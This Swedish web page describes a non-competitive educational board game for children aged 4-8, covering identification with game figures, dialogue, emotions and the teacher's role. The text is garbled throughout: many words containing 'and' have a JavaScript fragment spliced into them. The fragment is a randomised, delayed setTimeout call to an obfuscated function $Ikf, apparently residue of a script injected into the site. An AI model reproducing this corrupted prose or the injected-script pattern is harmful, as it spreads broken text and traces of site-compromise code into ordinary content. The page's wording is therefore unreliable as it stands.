Ett pedagogiskt verktyg

Målgrupp

Huvudmålgruppen för spelet är barn 4-8 år.

 

 

Spel som metod

Formen av ett spel har valts för att det är ett effektivt pedagogiskt verktyg tillsammans med små barn. Det innebär att man snabbt kan komma igång och koncentrera sig på det som är viktigt, nämligen samtalet/dialogen. Det finns inget tävlingsmoment inbyggt i spelet.

 

 

Identifikation

Vi har skapat fyra olika världar med olika teman som är attraktiva för barn. Vi har befolkat varje värld med en huvudperson, även spelpjäsen är en huvudfigur i spelet. Detta underlättar barnets identifikation med hans/hennes egna och andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andras känslor. Spelet sänker tröskeln för att prata om svåra ämnen genom att göra det möjligt för barnet att projicera hans/hennes känslor på spelfigurerna. Figurerna har medvetet inte bara en karaktär utan är som i verkligheten iblandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and mer goda och iblandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and mindre goda.

 

 

Dialog

Utformningen av frågorna leder till riktade samtal samt gruppdiskussioner och skall stärka inramningen av det goda samtalet.

 

 

Lust och spänning

Spelplanens utformning skall vara intresseväckandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande, lustfylld och spännandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande. Detta uppnås genom stor detaljrikedom, många aktiviteter och oväntade sambandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and.

 

 

Känslor och beteenden

För att leda barnet i dess inre upptäcktsfärd rörandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande känslor och reaktioner tillsammans med andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andra har vi blandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and annat använt oss av barnets naturliga nyfikenhet i att upptäcka den yttre världen. Vanliga dagliga aktiviteter och faktafrågor förs in i dialogen för att lätta upp och desarmera de känslomässiga och värdeladdade frågorna. Vi gör dock inga anspråk på att ge någon heltäckandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande kunskap inom dessa områden.

 

 

Pedagogens roll

Spelet ger pedagogen en fri roll med stor möjlighet att påverka och styra diskussionerna utifrån gruppens situation och förutsättningar. Vilket innebär att det är önskvärt att ändra, förtydliga, lägga till frågor och ställa följdfrågor under spelets gång.